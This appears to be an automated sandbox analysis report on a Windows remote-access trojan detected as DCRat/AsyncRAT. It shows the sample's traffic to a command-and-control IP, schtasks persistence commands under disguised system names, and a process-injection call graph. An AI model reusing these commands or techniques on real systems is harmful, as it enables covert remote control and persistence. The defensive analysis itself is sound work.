                                              Nov 27, 2024 04:02:51.179089069 CET1236INData Raw: 39 30 32 34 34 72 65 6d 20 2b 20 30 2e 34 38 37 38 30 34 38 37 38 76 77 20 2c 30 2e 36 38 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 6c 69 73 74 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 61 6c 63 28 2e 35 36 32 35 72 65
                                              Data Ascii: 90244rem + 0.487804878vw ,0.6875rem)){.window-main__list{padding-left:calc(.5625rem + .125*(100vw - 20rem)/ 25.625)}}@supports (padding-left:clamp(0.75rem ,0.6524390244rem + 0.487804878vw ,0.875rem)){.window-main__item{padding-left:clamp(.75re
                                              Nov 27, 2024 04:02:51.179100990 CET1236INData Raw: 09 3c 70 61 74 68 20 64 3d 22 4d 33 36 30 2e 35 32 32 20 35 36 33 2e 34 32 31 43 33 36 30 2e 35 32 32 20 35 36 33 2e 34 32 31 20 32 37 36 2e 31 34 37 20 34 39 37 2e 34 34 38 20 32 35 37 2e 31 37 34 20 34 33 30 2e 38 31 34 43 32 33 38 2e 32 20 33
                                              Data Ascii: <path d="M360.522 563.421C360.522 563.421 276.147 497.448 257.174 430.814C238.2 364.18 250.761 287.368 285.228 259.25C319.696 231.133 363.018 262.356 381.991 328.99C287.99 418.472 360.522 563.421 360.522 563.421Z" fill="#00498D" /></g>
                                              Nov 27, 2024 04:02:51.179264069 CET1236INData Raw: 69 6c 74 65 72 31 5f 66 5f 32 30 30 31 5f 35 22 20 78 3d 22 36 33 2e 38 35 39 31 22 20 79 3d 22 31 34 36 2e 33 31 39 22 20 77 69 64 74 68 3d 22 33 39 34 2e 35 34 34 22 20 68 65 69 67 68 74 3d 22 34 32 36 2e 31 34 32 22 20 66 69 6c 74 65 72 55 6e
                                              Data Ascii: ilter1_f_2001_5" x="63.8591" y="146.319" width="394.544" height="426.142" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in="Sou
                                              Nov 27, 2024 04:02:51.179275990 CET1236INData Raw: 63 6c 61 73 73 3d 22 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 22 3e 59 6f 75 20 61 72 65 20 61 63 63 65 73 73 69 6e 67 20 74 68 65 20 73 69 74 65 20 76 69 61 20 48 54 54 50 53 2c 20 62 75 74 20 74 68 65 20 73 69 74 65 20 64 6f 65 73 20
                                              Data Ascii: class="window-main__item">You are accessing the site via HTTPS, but the site does not have an SSL certificate installed.</li><li class="window-main__item">Your domain has an AAAA record, but the site only works with IPv4 on the server.
                                              Nov 27, 2024 04:02:51.179291010 CET797INData Raw: 65 4f 6e 55 73 65 22 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 3d 22 73 52 47 42 22 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 46 6c 6f 6f 64 20 66 6c 6f 6f 64 2d 6f 70 61 63 69 74 79 3d 22 30 22 20 72 65 73
                                              Data Ascii: eOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="75
                                              Nov 27, 2024 04:02:51.379973888 CET14INData Raw: 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: body></html>
                                              Nov 27, 2024 04:02:51.382492065 CET616OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?k1RxxsMic1WB03Lj3Jl0wy=eC69X&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&k1RxxsMic1WB03Lj3Jl0wy=eC69X HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/css
                                              User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
                                              Host: 188.120.228.203
                                              Nov 27, 2024 04:02:51.843673944 CET1236INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:51 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,label{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-height:1;font-family:Roboto;font-size:.875rem;-ms-text-size-adjust:100%;-moz-text-size-adjust:100%;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;background-color:#000}button,input,textarea{font-family:Roboto;font-size:inherit;line-height:inherit;color:inherit;background-color:rgba(0,0,0,0)}input,textarea{width:


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:22:01:59
                                              Start date:26/11/2024
                                              Path:C:\Users\user\Desktop\UNFOT5F1qt.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\UNFOT5F1qt.exe"
                                              Imagebase:0x420000
                                              File size:1'131'531 bytes
                                              MD5 hash:1C40D9E61FBBD5D9054638B98B10E1CF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:22:02:00
                                              Start date:26/11/2024
                                              Path:C:\Users\user\Desktop\UNFOT5F1qt.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\UNFOT5F1qt.exe"
                                              Imagebase:0x8a0000
                                              File size:1'131'531 bytes
                                              MD5 hash:1C40D9E61FBBD5D9054638B98B10E1CF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:22:02:00
                                              Start date:26/11/2024
                                              Path:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe"
                                              Imagebase:0x820000
                                              File size:586'240 bytes
                                              MD5 hash:222EDC84E2D32948F2639554B23E7B04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1397323956.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, Author: Joe Security
                                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, Author: ditekSHen
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, Author: ditekSHen
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 88%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:22:02:00
                                              Start date:26/11/2024
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 1156
                                              Imagebase:0xaf0000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:22:02:00
                                              Start date:26/11/2024
                                              Path:C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe"
                                              Imagebase:0x400000
                                              File size:440'224 bytes
                                              MD5 hash:74BE806E27A351565F2EC136DCB5232C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              Reputation:low
                                              Has exited:false

                                              General

                                              Target ID:9
                                              Start time:22:02:03
                                              Start date:26/11/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff774c70000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:22:02:03
                                              Start date:26/11/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff774c70000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:22:02:03
                                              Start date:26/11/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Users\All Users\Application Data\Application Data\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff774c70000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:22:02:03
                                              Start date:26/11/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff774c70000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:22:02:03
                                              Start date:26/11/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff774c70000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:14
                                              Start time:22:02:03
                                              Start date:26/11/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff774c70000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:15
                                              Start time:22:02:03
                                              Start date:26/11/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\regedit\explorer.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff774c70000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:16
                                              Start time:22:02:03
                                              Start date:26/11/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Documents and Settings\Public\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff774c70000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:17
                                              Start time:22:02:04
                                              Start date:26/11/2024
                                              Path:C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe"
                                              Imagebase:0x3d0000
                                              File size:586'240 bytes
                                              MD5 hash:222EDC84E2D32948F2639554B23E7B04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.1426473572.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, Author: Joe Security
                                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, Author: ditekSHen
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, Author: ditekSHen
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 88%, ReversingLabs
                                              Has exited:true

                                              General

                                              Target ID:18
                                              Start time:22:02:05
                                              Start date:26/11/2024
                                              Path:C:\Windows\regedit\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\regedit\explorer.exe
                                              Imagebase:0x810000
                                              File size:586'240 bytes
                                              MD5 hash:222EDC84E2D32948F2639554B23E7B04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000012.00000002.1476991915.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Windows\regedit\explorer.exe, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\regedit\explorer.exe, Author: Joe Security
                                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 88%, ReversingLabs
                                              Has exited:true

                                              General

                                              Target ID:19
                                              Start time:22:02:05
                                              Start date:26/11/2024
                                              Path:C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe"
                                              Imagebase:0xb90000
                                              File size:586'240 bytes
                                              MD5 hash:222EDC84E2D32948F2639554B23E7B04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000013.00000002.1476965095.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, Author: Joe Security
                                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, Author: ditekSHen
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, Author: ditekSHen
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 88%, ReversingLabs
                                              Has exited:true

                                              General

                                              Target ID:23
                                              Start time:22:02:13
                                              Start date:26/11/2024
                                              Path:C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe"
                                              Imagebase:0x510000
                                              File size:586'240 bytes
                                              MD5 hash:222EDC84E2D32948F2639554B23E7B04
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.1520715428.000000000285A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:true

                                              General

                                              Target ID:27
                                              Start time:22:02:38
                                              Start date:26/11/2024
                                              Path:C:\Windows\regedit\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\regedit\explorer.exe"
                                              Imagebase:0x100000
                                              File size:586'240 bytes
                                              MD5 hash:222EDC84E2D32948F2639554B23E7B04
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:17.3%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:17.9%
                                                Total number of Nodes:151
                                                Total number of Limit Nodes:14
                                                execution_graph 13929 f38fe2 13931 f38f53 13929->13931 13930 f38fb7 13931->13930 13934 f39dc0 13931->13934 13939 f39c06 13931->13939 13936 f39c23 13934->13936 13935 f39d7e 13935->13930 13936->13935 13944 f3d268 13936->13944 13974 f3d25c 13936->13974 13940 f39c23 13939->13940 13941 f39d7e 13940->13941 13942 f3d268 12 API calls 13940->13942 13943 f3d25c 12 API calls 13940->13943 13941->13930 13942->13940 13943->13940 13945 f3d297 13944->13945 14005 f3cee0 13945->14005 14009 f3ced6 13945->14009 13947 f3d358 13947->13936 13948 f3d409 13948->13947 14023 f3cb6a 13948->14023 14027 f3cb98 13948->14027 13949 f3d59c 13949->13947 14031 f3cc50 13949->14031 14036 f3cc58 13949->14036 13950 f3d60b 13950->13947 13951 f3d85b 13950->13951 13962 f3cc50 WriteProcessMemory 13950->13962 13963 f3cc58 WriteProcessMemory 13950->13963 13951->13947 13960 f3cc50 WriteProcessMemory 13951->13960 13961 f3cc58 WriteProcessMemory 13951->13961 13952 f3d8a4 13952->13947 13972 f3c6b0 Wow64SetThreadContext 13952->13972 13973 f3c6b8 Wow64SetThreadContext 13952->13973 13953 f3d977 13953->13947 14040 f3c602 13953->14040 14044 f3c608 13953->14044 13954 f3d9ac 13954->13947 14048 f3dc72 13954->14048 13955 f3d9f9 14053 f3e3d1 13955->14053 13960->13952 13961->13952 13962->13950 13963->13950 13972->13953 13973->13953 13976 f3d261 13974->13976 13975 f3d24f 13975->13936 13976->13975 13999 f3cee0 CreateProcessA 13976->13999 14000 f3ced6 CreateProcessA 13976->14000 13977 f3d358 13977->13936 13978 f3d340 13978->13977 13993 f3c6b0 Wow64SetThreadContext 13978->13993 13994 f3c6b8 Wow64SetThreadContext 13978->13994 13979 f3d409 13979->13977 13988 f3cb6a VirtualAllocEx 13979->13988 13989 f3cb98 VirtualAllocEx 13979->13989 13980 f3d59c 13980->13977 13991 f3cc50 WriteProcessMemory 13980->13991 13992 f3cc58 WriteProcessMemory 13980->13992 13981 f3d60b 13981->13977 13982 f3d85b 13981->13982 14003 f3cc50 WriteProcessMemory 13981->14003 14004 f3cc58 WriteProcessMemory 13981->14004 13982->13977 14001 f3cc50 WriteProcessMemory 13982->14001 14002 f3cc58 WriteProcessMemory 13982->14002 13983 f3d8a4 13983->13977 13995 f3c6b0 Wow64SetThreadContext 13983->13995 13996 f3c6b8 Wow64SetThreadContext 13983->13996 13984 f3d977 13984->13977 13997 f3c602 ResumeThread 13984->13997 13998 f3c608 ResumeThread 13984->13998 13985 f3d9ac 13985->13977 13987 f3dc72 SetKernelObjectSecurity 13985->13987 13986 f3d9f9 13990 f3e3d1 VirtualProtect 13986->13990 13987->13986 13988->13980 13989->13980 13990->13977 13991->13981 13992->13981 13993->13979 13994->13979 13995->13984 13996->13984 13997->13985 13998->13985 13999->13978 14000->13978 14001->13983 14002->13983 14003->13981 14004->13981 14006 f3cf69 14005->14006 14006->14006 14007 f3d0ce CreateProcessA 14006->14007 14008 f3d12b 14007->14008 14010 f3cec7 14009->14010 14011 f3cedb 14009->14011 14010->13947 14014 f3c6b8 14010->14014 14018 f3c6b0 14010->14018 14011->14011 14012 f3d0ce CreateProcessA 14011->14012 14013 f3d12b 14012->14013 14015 f3c6fd Wow64SetThreadContext 14014->14015 14017 f3c745 14015->14017 14017->13948 14019 f3c6b3 Wow64SetThreadContext 14018->14019 14020 f3c69f 14018->14020 14022 f3c745 14019->14022 14020->13948 14022->13948 14024 f3cb72 VirtualAllocEx 14023->14024 14026 f3cc15 14024->14026 14026->13949 14028 f3cbd8 VirtualAllocEx 14027->14028 14030 f3cc15 14028->14030 14030->13949 14032 f3cc53 WriteProcessMemory 14031->14032 14033 f3cc3f 14031->14033 14035 f3ccf7 14032->14035 14033->13950 14035->13950 14037 f3cca0 WriteProcessMemory 14036->14037 14039 f3ccf7 14037->14039 14039->13950 14041 f3c648 ResumeThread 14040->14041 14043 f3c679 14041->14043 14043->13954 14045 f3c648 ResumeThread 14044->14045 14047 f3c679 14045->14047 14047->13954 14049 f3dc9c 14048->14049 14058 f3e168 14049->14058 14063 f3e158 14049->14063 14050 f3dd49 14050->13955 14054 f3e400 14053->14054 14072 f3e6a0 14054->14072 14079 f3e690 14054->14079 14055 f3e42d 14055->13947 14059 f3e188 14058->14059 14060 f3e252 14059->14060 14068 f3c8dc 14059->14068 14060->14050 14062 f3e212 14062->14050 14065 f3e188 14063->14065 14064 f3e252 14064->14050 14065->14064 14066 f3c8dc SetKernelObjectSecurity 14065->14066 14067 f3e212 14066->14067 14067->14050 14069 f3e310 SetKernelObjectSecurity 14068->14069 14071 f3e39d 14069->14071 14071->14062 14073 f3e6bd 14072->14073 14074 f3e923 14073->14074 14086 f3c978 14073->14086 14074->14055 14077 f3c978 VirtualProtect 14078 f3e8c6 14077->14078 14078->14055 14081 f3e6bd 14079->14081 14080 f3e923 14080->14055 14081->14080 14082 f3c978 VirtualProtect 14081->14082 14083 f3e874 14082->14083 14083->14080 14084 f3c978 VirtualProtect 14083->14084 14085 f3e8c6 14084->14085 14085->14055 14087 f3ed28 VirtualProtect 14086->14087 14089 f3e874 14087->14089 14089->14074 14089->14077 14090 f3ee30 14092 f3ee74 14090->14092 14091 f3fc54 14092->14091 14097 f3cb04 14092->14097 14094 f3cb2c VirtualProtectEx 14096 f3eec7 14094->14096 14095 f3f1a8 LdrInitializeThunk 14095->14096 14096->14091 14096->14094 14096->14095 14098 f3fd38 GetSystemInfo 14097->14098 14100 f3fdae 14098->14100 14100->14096 14101 f30858 14102 f30872 14101->14102 14106 f30890 14102->14106 14110 f30880 14102->14110 14103 f3087a 14107 f308a1 14106->14107 14114 f30c10 14107->14114 14108 f308b3 14108->14103 14111 f308a1 14110->14111 14113 f30c10 LoadLibraryA 14111->14113 14112 f308b3 14112->14103 14113->14112 14116 f30c27 14114->14116 14115 f30c2f 14115->14108 14116->14115 14117 f30d12 LoadLibraryA 14116->14117 14118 f30d51 14117->14118

                                                Executed Functions

                                                Function 00F3EE30 Relevance: 2.4, APIs: 1, Instructions: 858COMMON
                                                Download Yara Rule

                                                Control-flow Graph

